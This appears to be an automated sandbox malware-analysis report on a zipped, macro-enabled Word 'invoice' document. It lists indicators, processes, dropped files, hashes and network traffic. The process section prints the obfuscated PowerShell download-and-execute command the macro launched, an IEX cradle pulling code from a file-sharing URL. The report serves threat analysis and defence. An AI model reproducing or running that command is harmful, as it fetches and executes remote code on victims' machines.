File name:

f2d0c66b801244c059f636d08a474079.zip

Full analysis: https://app.any.run/tasks/06513649-1118-460e-85b8-9d1e3d48b29e
Verdict: Malicious activity
Analysis date: May 25, 2024, 05:15:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

2C250C119ED943D4CC6A8ECE189213E4

SHA1:

AEF2057D95DA28AE2855118DAB03A82936888858

SHA256:

9DA040B601DB75CB64FE4779CBA274A42C732E34FDD3226183E30D36E8427BCC

SSDEEP:

384:9pqmGxmmLHAZbgLjs8HejYyEPEXHqZ6lcxsO:3k4mLHANgLQ8jlMe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 4080)

    • Starts POWERSHELL.EXE for commands execution

      • WINWORD.EXE (PID: 4080)

    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 4080)

    • Request from PowerShell that ran from MS Office

      • powershell.exe (PID: 752)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 4080)

    • Obfuscated call of IEX

      • powershell.exe (PID: 752)

    • Reads the Internet Settings

      • powershell.exe (PID: 752)

    • Unusual connection from system programs

      • powershell.exe (PID: 752)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 752)

  • INFO

    • Manual execution by a user

      • WINWORD.EXE (PID: 4080)
      • wmpnscfg.exe (PID: 1056)

    • Disables trace logs

      • powershell.exe (PID: 752)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 752)

    • Reads the computer name

      • wmpnscfg.exe (PID: 1056)

    • Checks supported languages

      • wmpnscfg.exe (PID: 1056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2021:03:14 21:03:34
ZipCRC: 0xe5a2bb63
ZipCompressedSize: 14161
ZipUncompressedSize: 17057
ZipFileName: INVOICE PACKAGE LINK TO DOWNLOAD.docm
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
752powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1056"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3968"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\f2d0c66b801244c059f636d08a474079.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4080"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE PACKAGE LINK TO DOWNLOAD.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
15 873
Read events
14 982
Write events
581
Delete events
310

Modification events

(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\f2d0c66b801244c059f636d08a474079.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
11
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
4080WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD851.tmp.cvr
MD5:
SHA256:
4080WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INVOICE PACKAGE LINK TO DOWNLOAD.docm.LNKbinary
MD5:EE918C1C9BC8319F944390C132F11AE1
SHA256:4FEE31DDAF26F161DEC4B7C4690F2261DE48F54D32DA2EA4B767F4205959325F
752powershell.exeC:\Users\admin\AppData\Local\Temp\lvdkvcb3.xar.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
752powershell.exeC:\Users\admin\AppData\Local\Temp\zubiuvqh.ago.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
752powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
752powershell.exeC:\Users\admin\AppData\Local\Temp\CabE4E3.tmpcompressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
4080WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:07023A215BFEDDD557C9456CA37B29DA
SHA256:05832CB7A8C1E218489E845864F9C1695A699D28ABD5417C3BBFC98D864E3221
752powershell.exeC:\Users\admin\AppData\Local\Temp\TarE4E4.tmpbinary
MD5:435A9AC180383F9FA094131B173A2F7B
SHA256:67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3968.43594\INVOICE PACKAGE LINK TO DOWNLOAD.docmdocument
MD5:F2D0C66B801244C059F636D08A474079
SHA256:08D4FD5032B8B24072BDFF43932630D4200F68404D7E12FFEEDA2364C8158873
4080WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:DDC65E4CEFF079278139C678A591FF1A
SHA256:178FF31FA4098E31C6CF6BD3AEED4F73250D5677A97C7AE8F04D72CDCD540155
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
6
DNS requests
2
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
752
powershell.exe
GET
200
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?834959a41c0f6567
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
752
powershell.exe
188.114.96.3:443
filetransfer.io
CLOUDFLARENET
NL
unknown
752
powershell.exe
199.232.210.172:80
ctldl.windowsupdate.com
FASTLY
US
unknown

DNS requests

Domain
IP
Reputation
filetransfer.io
  • 188.114.96.3
  • 188.114.97.3
malicious
ctldl.windowsupdate.com
  • 199.232.210.172
  • 199.232.214.172
whitelisted

Threats

PID
Process
Class
Message
1088
svchost.exe
Potentially Bad Traffic
ET INFO Commonly Abused File Sharing Domain in DNS Lookup (filetransfer .io)
752
powershell.exe
Potentially Bad Traffic
ET INFO Commonly Abused File Sharing Domain (filetransfer .io in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
f2d0c66b801244c059f636d08a474079.zip